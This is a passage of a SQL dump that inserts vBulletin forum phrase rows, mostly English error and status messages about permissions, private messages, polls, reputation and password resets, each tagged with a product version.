(34532, -1, 'must_specify_field_option', 'error', 'You must specify at least one option for this field, or allow the user to enter their own', 'vbulletin', '', 0, ''),
(34533, -1, 'name_exists', 'error', 'There is already a(n) {1} named \'{2}\'. You may not create duplicate names.', 'vbulletin', 'vBulletin Solutions', 1150742658, '3.6.0 Beta 3'),
(34534, -1, 'name_too_long_max_x', 'error', 'The name you have entered is too long. Please shorten it to {1} characters or fewer.', 'vbulletin', 'vBulletin Solutions', 1203612412, '3.7.0 Beta 6'),
(34535, -1, 'need_to_rebuild_avatars', 'error', 'Avatar thumbnails will now need to be rebuilt. Please go to Maintenance -> Update Counters -> Rebuild Avatar Thumbnails and click \"Rebuild Avatar Thumbnails\".', 'vbulletin', 'vBulletin Solutions', 1194289214, '3.7.0 Beta 1'),
(34536, -1, 'no_access_to_admin_control', 'error', 'Sorry, you don\'t have permission to access the administrative controls on this page.\r\n \r\nIf you need to access this page, ask your lead administrator to enable your permissions for this page using the Administrator Permissions section of the control panel.', 'vbulletin', '', 0, ''),
(34537, -1, 'no_applicable_posts_selected', 'error', 'You did not select any posts to which the action you picked can be applied.', 'vbulletin', '', 0, ''),
(34538, -1, 'no_avatar_categories_found', 'error', 'No avatar categories were foundAdd one now ', 'vbulletin', '', 0, ''),
(34539, -1, 'no_avatars_selected', 'error', 'You did not select any avatars to be inserted. Use the check-boxes at the side of the page to specify which images to insert.', 'vbulletin', '', 0, ''),
(34540, -1, 'no_calendars_matched_your_query', 'error', 'No Calendars Matched Your Query', 'vbulletin', '', 0, ''),
(34541, -1, 'no_changes_made', 'error', 'No changes were made.', 'vbulletin', 'vBulletin Solutions', 1216736026, '3.8.0 Alpha 1'),
(34542, -1, 'no_checkbox_item_not_deleted', 'error', 'You did not confirm that you wanted to delete this item.', 'vbulletin', 'vBulletin Solutions', 1192542904, '3.7.0 Beta 1'),
(34543, -1, 'no_content_tagged_with_x', 'error', 'No content has been tagged with \'{1}\'.', 'vbulletin', 'vBulletin Solutions', 1240397670, '3.8.3'),
(34544, -1, 'no_feeds_defined', 'error', 'No feeds are currently defined. \r\n \r\nClick here to add one. ', 'vbulletin', 'vBulletin Solutions', 1149265173, '3.6.0 Beta 1'),
(34545, -1, 'no_file_paths_changed', 'error', 'No file paths changed. There is nothing to do!', 'vbulletin', 'vBulletin Solutions', 1192543587, '3.7.0 Beta 1'),
(34546, -1, 'no_file_uploaded_and_no_local_file_found', 'error', 'No file uploaded and no local file found.', 'vbulletin', '', 0, ''),
(34547, -1, 'no_global_announcements_defined', 'error', 'There are no Global Announcements defined', 'vbulletin', '', 0, ''),
(34548, -1, 'no_groups_defined_as_banned', 'error', 'The administrator has not specified any groups that contain banned users. Please do so using the usergroup editor.', 'vbulletin', '', 0, ''),
(34549, -1, 'no_help_topics', 'error', 'There are currently no help topics associated with this page/action', 'vbulletin', '', 0, ''),
(34550, -1, 'no_images_selected', 'error', 'You did not select any images to be inserted as {1}. Use the check-boxes at the side of the page to specify which images to insert.', 'vbulletin', '', 0, ''),
(34551, -1, 'no_join_requests_matched_your_query', 'error', 'No Join Requests Matched Your Query', 'vbulletin', '', 0, ''),
(34552, -1, 'no_log_entries_matched_your_query', 'error', 'No Log Entries Matched Your Query', 'vbulletin', '', 0, ''),
(34553, -1, 'no_log_file_defined_in_vbulletin_options', 'error', 'No log file defined in vBulletin Options', 'vbulletin', '', 0, ''),
(34554, -1, 'no_logs_matched_your_query', 'error', 'No Logs Matched Your Query', 'vbulletin', '', 0, ''),
(34555, -1, 'no_matches_found', 'error', 'No Matches Found', 'vbulletin', '', 0, ''),
(34556, -1, 'no_moderator_matched_your_query', 'error', 'No Moderator Matched Your Query', 'vbulletin', '', 0, ''),
(34557, -1, 'no_new_avatars', 'error', 'No avatars were found that have not already been added', 'vbulletin', '', 0, ''),
(34558, -1, 'no_new_post_icons', 'error', 'No post icons were found that have not already been added', 'vbulletin', '', 0, ''),
(34559, -1, 'no_new_smilies', 'error', 'No smilies were found that have not already been added', 'vbulletin', '', 0, ''),
(34560, -1, 'no_notice_criteria_active', 'error', 'In order to be valid, a notice must have at least one active criterion (or it would never be shown). \r\n \r\nPlease go back and set up display criteria.', 'vbulletin', 'vBulletin Solutions', 1189782638, '3.6.8'),
(34561, -1, 'no_permission', 'error', 'Sorry, you are not authorized to view this page', 'vbulletin', '', 0, ''),
(34562, -1, 'no_permission_announcement', 'error', 'You are not authorized to add or edit announcements in this forum', 'vbulletin', '', 0, ''),
(34563, -1, 'no_permission_avatars', 'error', 'You are not authorized to edit avatars', 'vbulletin', '', 0, ''),
(34564, -1, 'no_permission_ban_non_registered_users', 'error', 'You are not authorized to ban users who are not considered normal, registered users', 'vbulletin', '', 0, ''),
(34565, -1, 'no_permission_ban_users', 'error', 'You are not authorized to ban users', 'vbulletin', '', 0, ''),
(34566, -1, 'no_permission_duplicate_reputation', 'error', 'You cannot have multiple reputation levels with the same minimum reputation requirement', 'vbulletin', 'vBulletin Solutions', 1245773640, '3.8.3'),
(34567, -1, 'no_permission_edit_selector_x_property_y', 'error', 'You do not have permission to edit {1} -> {2}.', 'vbulletin', 'vBulletin Solutions', 1193401523, '3.7.0 Beta 1'),
(34568, -1, 'no_permission_forum_password', 'error', 'You are not authorized to set a password for this forum', 'vbulletin', '', 0, ''),
(34569, -1, 'no_permission_global_announcement', 'error', 'Only Super Moderators and Administrators may add or edit Global Announcements', 'vbulletin', '', 0, ''),
(34570, -1, 'no_permission_ips', 'error', 'You are not authorized to view IP addresses', 'vbulletin', '', 0, ''),
(34571, -1, 'no_permission_queries', 'error', 'You are not authorized to execute SQL queries', 'vbulletin', '', 0, ''),
(34572, -1, 'no_permission_search_users', 'error', 'You are not authorized to search for users', 'vbulletin', '', 0, ''),
(34573, -1, 'no_permission_signatures', 'error', 'You are not authorized to edit signatures', 'vbulletin', '', 0, ''),
(34574, -1, 'no_permission_un_ban_users', 'error', 'You are not authorized to un-ban users', 'vbulletin', '', 0, ''),
(34575, -1, 'no_permissions_set', 'error', 'There are no permissions set for the selected forum. No duplication will take place', 'vbulletin', '', 0, ''),
(34576, -1, 'no_phrases_defined', 'error', 'There are no phrases defined', 'vbulletin', '', 0, ''),
(34577, -1, 'no_phrases_matched_your_query', 'error', 'No Phrases Matched Your Query', 'vbulletin', '', 0, ''),
(34578, -1, 'no_picture_comments_awaiting_approval', 'error', 'You have no picture comments awaiting approval. Return to your album list .', 'vbulletin', 'vBulletin Solutions', 1200322826, '3.7.0 Beta 4'),
(34579, -1, 'no_pm_to_download', 'error', 'You have no private messages to download.', 'vbulletin', '', 0, ''),
(34580, -1, 'no_polls_found', 'error', 'No polls found.', 'vbulletin', 'vBulletin Solutions', 1197975794, '3.7.0 Beta 3'),
(34581, -1, 'no_post_edit_histories_matched_your_query', 'error', 'No Post Edit Histories Matched Your Query', 'vbulletin', '', 0, ''),
(34582, -1, 'no_post_icon_categories_found', 'error', 'No post icon categories were foundAdd one now ', 'vbulletin', '', 0, ''),
(34583, -1, 'no_post_icons_selected', 'error', 'You did not select any post icons to be inserted. Use the check-boxes at the side of the page to specify which images to insert.', 'vbulletin', '', 0, ''),
(34584, -1, 'no_private_messages_matched_your_query', 'error', 'No Private Messages Matched Your Query', 'vbulletin', '', 0, ''),
(34585, -1, 'no_private_messages_selected', 'error', 'No private messages selected.', 'vbulletin', '', 0, ''),
(34586, -1, 'no_profile_fields_defined', 'error', 'You don\'t have any Custom Profile fields defined. \r\n \r\nYou can add profile fields here .', 'vbulletin', '', 0, ''),
(34587, -1, 'no_public_usergroups', 'error', 'There are currently no public usergroups available for you to join.', 'vbulletin', '', 0, ''),
(34588, -1, 'no_reason_specified', 'error', 'No reason was specified.', 'vbulletin', 'vBulletin Solutions', 1157986852, '3.6.1'),
(34589, -1, 'no_recently_updated_albums', 'error', 'No albums have been updated recently.', 'vbulletin', 'vBulletin Solutions', 1233745282, '3.8.2'),
(34590, -1, 'no_referrals_matched_your_query', 'error', 'No Referrals Matched Your Query', 'vbulletin', '', 0, ''),
(34591, -1, 'no_reminders_scheduled', 'error', 'This date has no reminders scheduled', 'vbulletin', '', 0, ''),
(34592, -1, 'no_results_matched_your_query', 'error', 'No Results Matched Your Query', 'vbulletin', '', 0, ''),
(34593, -1, 'no_select_pictures_upload', 'error', 'You did not select any pictures to upload.', 'vbulletin', 'vBulletin Solutions', 1192543144, '3.7.0 Beta 1'),
(34594, -1, 'no_sig_pic_to_use', 'error', 'There is no current signature picture to use.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34595, -1, 'no_smilie_categories_found', 'error', 'No smilie categories were foundAdd one now ', 'vbulletin', '', 0, ''),
(34596, -1, 'no_smilies_selected', 'error', 'You did not select any smilies to be inserted. Use the check-boxes at the side of the page to specify which images to insert.', 'vbulletin', '', 0, ''),
(34597, -1, 'no_tags_selected', 'error', 'No tags selected.', 'vbulletin', 'vBulletin Solutions', 1216727308, '3.8.0 Alpha 1'),
(34598, -1, 'no_threads_matched_your_query', 'error', 'No Threads Matched Your Query', 'vbulletin', '', 0, ''),
(34599, -1, 'no_unread_picture_comments', 'error', 'You have no unread picture comments. Return to your album list .', 'vbulletin', 'vBulletin Solutions', 1200322803, '3.7.0 Beta 4'),
(34600, -1, 'no_user_ranks_defined', 'error', 'There are no User Ranks defined', 'vbulletin', '', 0, ''),
(34601, -1, 'no_userchange_history', 'error', 'This user does not have any change history.', 'vbulletin', 'vBulletin Solutions', 1190723918, '3.7.0 Beta 1'),
(34602, -1, 'no_users_banned_from_x_board', 'error', 'No users are banned from {1}.', 'vbulletin', '', 0, ''),
(34603, -1, 'no_users_banned_from_x_board_click_here', 'error', 'No users are banned from {1}. \r\n \r\nTo ban a user, click here ', 'vbulletin', '', 0, ''),
(34604, -1, 'no_users_matched_your_query', 'error', 'No Users Matched Your Query', 'vbulletin', '', 0, ''),
(34605, -1, 'no_users_matched_your_query_x', 'error', 'No Users Matched Your Query, Username {1} does not exist', 'vbulletin', 'vBulletin Solutions', 1190990885, '3.7.0 Beta 1'),
(34606, -1, 'no_visitor_messages_matched_your_query', 'error', 'No Visitor Messages Matched Your Query', 'vbulletin', 'vBulletin Solutions', 1222174849, '3.8.0 Alpha 2'),
(34607, -1, 'no_xml_and_no_path', 'error', 'Sorry, no XML was passed into this function and the $path variable empty', 'vbulletin', '', 0, ''),
(34608, -1, 'noattachments', 'error', 'There are no attachments to display', 'vbulletin', '', 0, ''),
(34609, -1, 'nocalendars', 'error', 'The Calendar is currently disabled.', 'vbulletin', '', 0, ''),
(34610, -1, 'noevents', 'error', 'There are no events to display.', 'vbulletin', '', 0, ''),
(34611, -1, 'noid', 'error', 'No {1} specified. If you followed a valid link, please notify the administrator ', 'vbulletin', '', 0, ''),
(34612, -1, 'nomemberlist', 'error', 'Sorry! The administrator has disabled the list of members.', 'vbulletin', '', 0, ''),
(34613, -1, 'nomemberlistsearch', 'error', 'Sorry! The administrator has disabled searching of the member list.', 'vbulletin', '', 0, ''),
(34614, -1, 'nomessage', 'error', 'You didn\'t enter a message. Please press your back button and enter one.', 'vbulletin', '', 0, ''),
(34615, -1, 'nomessagetouser', 'error', 'Please enter a message to send to the user.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34616, -1, 'nonextnewest', 'error', 'There are no threads newer than the previous one. Click the back button in your browser to return to it.', 'vbulletin', '', 0, ''),
(34617, -1, 'nonextoldest', 'error', 'There are no threads older than the previous one. Click the back button in your browser to return to it.', 'vbulletin', '', 0, ''),
(34618, -1, 'nopermission_banned', 'error', 'You have been banned for the following reason: \r\n{1}
\r\n\r\nDate the ban will be lifted: {2}
', 'vbulletin', '', 0, ''),
(34619, -1, 'nopermission_banned_infractions', 'error', 'You have been banned due to infractions.
Date the ban will be lifted: {1}
', 'vbulletin', 'vBulletin Solutions', 1155853909, '3.6.1'),
(34620, -1, 'nopermission_loggedin', 'error', '{1} , you do not have permission to access this page. This could be due to one of several reasons:
\r\n\r\n\r\n Your user account may not have sufficient privileges to access this page. Are you trying to edit someone else\'s post, access administrative features or some other privileged system? \r\n If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation. \r\n \r\n\r\n', 'vbulletin', '', 0, ''),
(34621, -1, 'nopermission_loggedin_ajax', 'error', '{1}, you do not have permission to access this page. This could be due to one of several reasons:\r\n- Your user account may not have sufficient privileges to access this page. Are you trying to edit someone else\'s post, access administrative features or some other privileged system?\r\n- If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.', 'vbulletin', 'vBulletin Solutions', 1198883178, '3.7.0 Beta 4'),
(34622, -1, 'nopermission_loggedout', 'error', 'You do not have permission to perform this action. Please refresh the page and login before trying again.', 'vbulletin', 'vBulletin Solutions', 1149852934, '3.6.0 Beta 2'),
(34623, -1, 'nopolloptionselected', 'error', 'You did not select an option to vote for. Please press back to return to the poll and choose an option before voting.', 'vbulletin', '', 0, ''),
(34624, -1, 'noquestionoption', 'error', 'Please complete both the question field and at least 2 option fields. Press the back button, correct the problem and try again.', 'vbulletin', '', 0, ''),
(34625, -1, 'noreason', 'error', 'Please enter a reason for reporting this post.', 'vbulletin', '', 0, ''),
(34626, -1, 'noregister', 'error', 'Sorry, registration has been disabled by the administrator.', 'vbulletin', '', 0, ''),
(34627, -1, 'nosignaturepermission', 'error', 'Sorry, you are not permitted to have a signature.', 'vbulletin', '', 0, ''),
(34628, -1, 'nosplitposts', 'error', 'You must specify some posts to split off from this thread.', 'vbulletin', '', 0, ''),
(34629, -1, 'nosubject', 'error', 'Please complete both the subject and message fields.', 'vbulletin', '', 0, ''),
(34630, -1, 'nosubscriptions', 'error', '{1} does not have any paid subscriptions available to which you can subscribe.', 'vbulletin', '', 0, ''),
(34631, -1, 'nosubtype', 'error', 'An invalid threadid or forumid was specified.', 'vbulletin', '', 0, ''),
(34632, -1, 'not_member_groups_find_some', 'error', 'You are not a member of any groups where you can perform this action. Find some to join! ', 'vbulletin', 'vBulletin Solutions', 1209132490, '3.7.0'),
(34633, -1, 'not_much_would_be_accomplished_by_merging', 'error', 'vBulletin Tip #42: Not much would be accomplished by merging this item with itself.', 'vbulletin', '', 0, ''),
(34634, -1, 'not_subscribed_to_any_forums', 'error', 'You are not subscribed to any forums', 'vbulletin', '', 0, ''),
(34635, -1, 'nothing_to_do', 'error', 'Nothing to Do', 'vbulletin', '', 0, ''),
(34636, -1, 'notitle', 'error', 'Please complete the title field for this thread.', 'vbulletin', '', 0, ''),
(34637, -1, 'notmemberofdisplaygroup', 'error', 'You cannot set a group to which you do not belong as your displayed group', 'vbulletin', '', 0, ''),
(34638, -1, 'notonlist', 'error', '{1} is not on your list.', 'vbulletin', '', 0, ''),
(34639, -1, 'nousername', 'error', 'You did not specify a username for your post.', 'vbulletin', '', 0, ''),
(34640, -1, 'nousernoteself', 'error', 'You are not allowed to view or modify any user notes that pertain to yourself.', 'vbulletin', '', 0, ''),
(34641, -1, 'number_tags_add_exceeded_x', 'error', 'The number of tags you tried to add to this thread exceeded the maximum number of tags by {1}.', 'vbulletin', 'vBulletin Solutions', 1196431410, '3.7.0 Beta 1'),
(34642, -1, 'passwordexpired', 'error', 'Your password is {1} days old, and has therefore expired. \r\n \r\nPlease change your password using this page .', 'vbulletin', '', 0, ''),
(34643, -1, 'passwordhistory', 'error', 'Sorry, you may not use a password that you have used in the past {1} days. \r\n \r\nPlease go back and try again.', 'vbulletin', '', 0, ''),
(34644, -1, 'passwordmismatch', 'error', 'The two passwords that you entered do not match.', 'vbulletin', '', 0, ''),
(34645, -1, 'pending_approval_for_group', 'error', 'You are already Pending approval for this group.', 'vbulletin', 'vBulletin Solutions', 1196174046, '3.7.0 Beta 1'),
(34646, -1, 'php_error_exec_disabled', 'error', 'PHP Error: The function exec() has been disabled.', 'vbulletin', 'vBulletin Solutions', 1212055432, '3.7.2'),
(34647, -1, 'php_error_unspecified_exec', 'error', 'PHP Error: Unspecified error in exec().', 'vbulletin', 'vBulletin Solutions', 1212055457, '3.7.2'),
(34648, -1, 'php_error_x', 'error', 'PHP Error: {1}.', 'vbulletin', 'vBulletin Solutions', 1212055471, '3.7.2'),
(34649, -1, 'picture_thumb_url_updated', 'error', 'Album picture thumbnail URL update successfully', 'vbulletin', 'vBulletin Solutions', 1192543619, '3.7.0 Beta 1'),
(34650, -1, 'pictures_moved_to_the_database', 'error', 'Pictures moved to the database successfully', 'vbulletin', 'vBulletin Solutions', 1192543632, '3.7.0 Beta 1'),
(34651, -1, 'pictures_moved_to_the_file_system', 'error', 'Pictures moved to the file system successfully', 'vbulletin', 'vBulletin Solutions', 1192543710, '3.7.0 Beta 1'),
(34652, -1, 'pictures_moved_within_file_system_update_x_y', 'error', 'Your vBulletin settings have been updated to read your album pictures or thumbnails from a new location. The following path or paths were changed:\r\n\r\nYou must now manually move your pictures to the new folders using an FTP client or shell commands, such as:\r\n', 'vbulletin', 'vBulletin Solutions', 1192543906, '3.7.0 Beta 1'),
(34653, -1, 'pictures_moved_within_the_file_system', 'error', 'Pictures moved within the file system successfully', 'vbulletin', 'vBulletin Solutions', 1192543660, '3.7.0 Beta 1'),
(34654, -1, 'pictures_not_moved_to_the_database', 'error', 'Pictures not moved to the database', 'vbulletin', 'vBulletin Solutions', 1192543671, '3.7.0 Beta 1'),
(34655, -1, 'pictures_not_moved_to_the_file_system', 'error', 'Pictures not moved to the file system', 'vbulletin', 'vBulletin Solutions', 1192543724, '3.7.0 Beta 1'),
(34656, -1, 'pictures_not_moved_within_the_file_system', 'error', 'Pictures not moved within the file system', 'vbulletin', 'vBulletin Solutions', 1192543682, '3.7.0 Beta 1'),
(34657, -1, 'please_complete_required_fields', 'error', 'Please Complete All Required Fields', 'vbulletin', '', 0, ''),
(34658, -1, 'please_confirm_delete', 'error', 'Please confirm your desire to delete this item by checking the \"Delete\" box.', 'vbulletin', '', 0, ''),
(34659, -1, 'please_ensure_x_file_is_located_at_y', 'error', 'Please ensure that the {1} file is located at {2} and then reload this page', 'vbulletin', '', 0, ''),
(34660, -1, 'pm_adminoff', 'error', 'Your administrator has disabled private messaging.', 'vbulletin', '', 0, ''),
(34661, -1, 'pm_nofolders', 'error', 'You must first create a custom folder if you wish to be able to move messages from your inbox. You may start by clicking Here .', 'vbulletin', '', 0, ''),
(34662, -1, 'pm_non_contacts_cant_reply', 'error', 'Your options are configured to accept private messages only from your contacts. Therefore the following users will be unable to reply:To send the message anyway, check the checkbox below in the Additional Options section , otherwise remove these users\' names from the recipients list.', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'),
(34663, -1, 'pm_throttle_reached', 'error', 'You may only post {1} messages every {2} minutes.', 'vbulletin', 'vBulletin Solutions', 1216399091, '3.8.0 Alpha 1'),
(34664, -1, 'pm_turnedoff', 'error', 'You have turned off private messages. You may not send private messages until you turn them on by editing your options.', 'vbulletin', 'vBulletin Solutions', 1166087850, '3.6.5'),
(34665, -1, 'pmfloodcheck', 'error', 'This forum requires that you wait {1} seconds between sending private messages. Please try again in {2} seconds.', 'vbulletin', '', 0, ''),
(34666, -1, 'pminvalidrecipient', 'error', 'Invalid recipient username. Please press the back button, enter the correct username and try again. Click Here to See the Members List ', 'vbulletin', '', 0, ''),
(34667, -1, 'pmquotaexceeded', 'error', '{1} has exceeded their stored private messages quota and cannot accept further messages until they clear some space.', 'vbulletin', '', 0, ''),
(34668, -1, 'pmrecipientsnotfound', 'error', 'The following users were not found: {1} ', 'vbulletin', '', 0, ''),
(34669, -1, 'pmrecipturnedoff', 'error', '{1} has chosen not to receive private messages or may not be allowed to receive private messages. Therefore you may not send your message to him/her. \r\n \r\nIf you are trying to send this message to multiple recipients, remove {1} from the recipient list and send the message again.', 'vbulletin', 'vBulletin Solutions', 1200500926, '3.7.0 Beta 4'),
(34670, -1, 'pmtoomanyrecipients', 'error', 'Too many recipients - you are attempting to send to {1} users but you are only allowed to send to {2} users.', 'vbulletin', '', 0, ''),
(34671, -1, 'pmusernotallowed', 'error', '{1} is not allowed to use private messaging', 'vbulletin', '', 0, ''),
(34672, -1, 'pollalready', 'error', 'You cannot add a poll to this thread because it already has a poll attached to it.', 'vbulletin', '', 0, ''),
(34673, -1, 'pollclosed', 'error', 'The poll you selected is closed. Please press back to return to the poll.', 'vbulletin', '', 0, ''),
(34674, -1, 'polloptionlength', 'error', 'Poll options cannot exceed {1} characters. Option(s) {2} exceed this limitation.', 'vbulletin', '', 0, ''),
(34675, -1, 'polltimeout', 'error', 'You can only add a poll to a thread within {1} minutes of posting the thread.', 'vbulletin', '', 0, ''),
(34676, -1, 'postalreadywarned', 'error', 'This post has already received an infraction.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34677, -1, 'postfloodcheck', 'error', 'This forum requires that you wait {1} seconds between posts. Please try again in {2} seconds.', 'vbulletin', '', 0, ''),
(34678, -1, 'prefix_deleted', 'error', 'Prefix Deleted Successfully', 'vbulletin', 'vBulletin Solutions', 1190029584, '3.7.0 Beta 1'),
(34679, -1, 'prefix_saved', 'error', 'Prefix Saved', 'vbulletin', 'vBulletin Solutions', 1190029600, '3.7.0 Beta 1'),
(34680, -1, 'prefix_set_deleted', 'error', 'Prefix Set Deleted Successfully', 'vbulletin', 'vBulletin Solutions', 1190029615, '3.7.0 Beta 1'),
(34681, -1, 'prefix_set_saved', 'error', 'Prefix Set Saved', 'vbulletin', 'vBulletin Solutions', 1190029632, '3.7.0 Beta 1'),
(34682, -1, 'primary_equals_secondary', 'error', 'The primary usergroup set by this subscription is also listed as a secondary usergroup for this subscription. Please change the primary group or remove the secondary group.', 'vbulletin', 'vBulletin Solutions', 1143045338, '3.6.0 Beta 1'),
(34683, -1, 'problem_with_x_phrase', 'error', 'There is a problem with the {1} email phrase.', 'vbulletin', 'vBulletin Solutions', 1156879357, '3.6.1'),
(34684, -1, 'product_disabled_successfully', 'error', 'Product Disabled Successfully', 'vbulletin', '', 0, ''),
(34685, -1, 'product_enabled_successfully', 'error', 'Product Enabled Successfully', 'vbulletin', '', 0, ''),
(34686, -1, 'product_id_invalid', 'error', 'The product ID you have specified is invalid. \r\n \r\nProduct IDs must be no more than 25 characters long and must consist of only lowercase characters a-z, numbers 0-9 and underscores. \r\n \r\nTherefore, we suggest that you alter your specified product ID from this:\r\n\r\n{1} \r\n\r\nto this:\r\n{2} ', 'vbulletin', '', 0, ''),
(34687, -1, 'product_not_installed_disabled', 'error', 'The required product has not been installed or is currently disabled.', 'vbulletin', 'vBulletin Solutions', 1178022846, '3.6.6'),
(34688, -1, 'product_requires_plugin_system', 'error', 'To use this product the plugin system must be enabled.', 'vbulletin', 'vBulletin Solutions', 1178289007, '3.6.6'),
(34689, -1, 'product_x_imported', 'error', 'Product {1} Imported', 'vbulletin', '', 0, ''),
(34690, -1, 'product_x_installed_no_overwrite', 'error', 'Product \'{1}\' is already installed and you did not specify that this product may be overwritten/upgraded.', 'vbulletin', '', 0, ''),
(34691, -1, 'product_x_installed_version_y_z', 'error', 'Product {1} is already installed. (Existing version: {2}; this version: {3})', 'vbulletin', '', 0, ''),
(34692, -1, 'product_x_uninstalled', 'error', 'Product {1} Uninstalled', 'vbulletin', '', 0, ''),
(34693, -1, 'product_x_updated', 'error', 'Product {1} Updated', 'vbulletin', '', 0, ''),
(34694, -1, 'profile_field_uneditable', 'error', 'This profile field is no longer editable.', 'vbulletin', 'vBulletin Solutions', 1193765845, '3.7.0 Beta 1'),
(34695, -1, 'promotion_join_same_group', 'error', 'You specified the group to join itself which is not allowed', 'vbulletin', '', 0, ''),
(34696, -1, 'pruned_control_panel_log_successfully', 'error', 'Pruned Control Panel Log Successfully', 'vbulletin', '', 0, ''),
(34697, -1, 'pruned_moderator_log_successfully', 'error', 'Pruned Moderator Log Successfully', 'vbulletin', '', 0, ''),
(34698, -1, 'pruned_post_edit_history_successfully', 'error', 'Pruned Post Edit History Successfully', 'vbulletin', '', 0, ''),
(34699, -1, 'pruned_scheduled_task_log_successfully', 'error', 'Pruned Scheduled Task Log Successfully', 'vbulletin', '', 0, ''),
(34700, -1, 'pruned_threads_successfully', 'error', 'Pruned Threads Successfully. It is recommended that you update counters now.', 'vbulletin', '', 0, ''),
(34701, -1, 'pruned_threads_successfully_modcp', 'error', 'Pruned Threads Successfully', 'vbulletin', '', 0, ''),
(34702, -1, 'rebuilt_attachment_thumbnails_successfully', 'error', 'Rebuilt Attachment Thumbnails Successfully', 'vbulletin', '', 0, ''),
(34703, -1, 'rebuilt_avatar_thumbnails_successfully', 'error', 'Rebuilt Avatar Thumbnails Successfully', 'vbulletin', 'vBulletin Solutions', 1193961331, '3.7.0 Beta 1'),
(34704, -1, 'rebuilt_bitfields_successfully', 'error', 'Rebuilt Bitfields Successfully', 'vbulletin', '', 0, ''),
(34705, -1, 'rebuilt_picture_thumbnails_successfully', 'error', 'Rebuilt Picture Thumbnails Successfully', 'vbulletin', 'vBulletin Solutions', 1198889919, '3.7.0 Beta 4'),
(34706, -1, 'rebuilt_search_index_successfully', 'error', 'Rebuilt Search Index Successfully', 'vbulletin', '', 0, ''),
(34707, -1, 'rebuilt_sgicon_thumbnails_successfully', 'error', 'Rebuilt Social Group Icon Thumbnails Successfully', 'vbulletin', 'vBulletin Solutions', 1231771040, '3.8.1'),
(34708, -1, 'rebuilt_statistics_successfully', 'error', 'Rebuilt Statistics Successfully', 'vbulletin', '', 0, ''),
(34709, -1, 'rebuilt_thumbnails_successfully', 'error', 'Rebuilt thumbnails successfully', 'vbulletin', 'vBulletin Solutions', 1192543745, '3.7.0 Beta 1'),
(34710, -1, 'rebuilt_user_reputation_successfully', 'error', 'Rebuilt User Reputation Successfully', 'vbulletin', '', 0, ''),
(34711, -1, 'recent_album_updates_disabled', 'error', 'Recently Updated Albums are not currently enabled.', 'vbulletin', 'vBulletin Solutions', 1217334911, '3.8.0 Alpha 1'),
(34712, -1, 'recent_album_updates_rebuilt', 'error', 'Recently Updated Albums successfully rebuilt.', 'vbulletin', 'vBulletin Solutions', 1217334953, '3.8.0 Alpha 1'),
(34713, -1, 'redirecting_please_wait', 'error', 'Please Wait While You Are Redirected...', 'vbulletin', '', 0, ''),
(34714, -1, 'regexincorrect', 'error', 'You did not enter the correct format for the {1} field. Please read the field description for the expected format.', 'vbulletin', '', 0, ''),
(34715, -1, 'register_not_agreed', 'error', 'You have chosen not to accept the forum rules, so registration cannot continue. \r\n \r\nClick here to return to the main forums page, or click the \'Back\' button on your browser if you now want to agree with the forum rules.', 'vbulletin', '', 0, ''),
(34716, -1, 'registeremail', 'error', 'Thank you for registering, {1}. An email has been dispatched to {2} with details on how to activate your account. Click here to return to where you were previously.\r\n \r\n \r\nYou will receive an email in your inbox. You MUST follow the link in that email before you can post on these forums. Until you do that, you will be told that you do not have permission to post.', 'vbulletin', '', 0, ''),
(34717, -1, 'registration_complete', 'error', 'Thank you, {1} . Your registration is now complete. \r\n \r\nYou may now proceed to edit your Profile in order to fill in additional personal details about yourself, or you could modify your Options to customize your browsing experience of this site. If you would rather do these things later, you can do so by following the links around the site to your User Control Panel . \r\n \r\nAlternatively, you can simply go back to the Forums and start posting in threads.', 'vbulletin', '', 0, ''),
(34718, -1, 'regular_expression_is_invalid', 'error', 'The regular expression specified is invalid.', 'vbulletin', 'vBulletin Solutions', 1204631481, '3.7.0 Beta 6'),
(34719, -1, 'reminder_title_too_long', 'error', 'Sorry, your reminder\'s title exceeded the {1} character limit by {2} characters. Please go back and shorten it', 'vbulletin', '', 0, ''),
(34720, -1, 'replacement_already_exists', 'error', 'A replacement variable searching for {1} already exists. It is set to replace {1} with {2} . \r\n \r\nTo edit this replacement, please click here .', 'vbulletin', '', 0, ''),
(34721, -1, 'report_post_floodcheck', 'error', 'This forum requires that you wait {1} seconds between reporting posts. Please try again in {2} seconds.', 'vbulletin', 'vBulletin Solutions', 1183391384, '3.6.8'),
(34722, -1, 'reputation_yourpost', 'error', 'This post has not received any reputation.\r\n\r\nYou currently have {1} reputation point(s).', 'vbulletin', 'vBulletin Solutions', 1149791762, '3.6.0 Beta 2'),
(34723, -1, 'reputationbanned', 'error', 'You cannot give reputation to this user.', 'vbulletin', '', 0, ''),
(34724, -1, 'reputationdisabled', 'error', 'The reputation system is currently disabled.', 'vbulletin', '', 0, ''),
(34725, -1, 'reputationownpost', 'error', 'You cannot add reputation to your own posts.', 'vbulletin', '', 0, ''),
(34726, -1, 'reputationreason', 'error', 'A comment must be left for negative reputation.', 'vbulletin', 'vBulletin Solutions', 1148495748, '3.6.0 Beta 1'),
(34727, -1, 'reputationsamepost', 'error', 'You cannot give Reputation to the same post twice.', 'vbulletin', '', 0, ''),
(34728, -1, 'reputationsameuser', 'error', 'You must spread some Reputation around before giving it to {1} again.', 'vbulletin', '', 0, ''),
(34729, -1, 'reputationtoomany', 'error', 'You have given out too much Reputation in the last 24 hours, try again later.', 'vbulletin', '', 0, ''),
(34730, -1, 'required_field_x_missing_or_invalid', 'error', 'A required field called {1} is missing or has an invalid value.', 'vbulletin', '', 0, ''),
(34731, -1, 'requiredfieldmissing', 'error', 'You have not completed the required field \"{1}\".', 'vbulletin', '', 0, ''),
(34732, -1, 'requiredfields', 'error', 'Please complete all the fields. Press the back button, correct the problem then try again.', 'vbulletin', '', 0, ''),
(34733, -1, 'resetbadid', 'error', 'The address that you have used to request a new password is not valid. Please request a new password be sent to you by using this form .', 'vbulletin', 'vBulletin Solutions', 1168257044, '3.6.5'),
(34734, -1, 'resetexpired', 'error', 'The request to reset your password was made more than 24 hours ago, so it has expired. To resubmit the request, please use this form .', 'vbulletin', '', 0, ''),
(34735, -1, 'resetpw', 'error', 'Your password has now been reset and emailed to you. Please check your email to find your new password. To change your password, please use this form .', 'vbulletin', '', 0, ''),
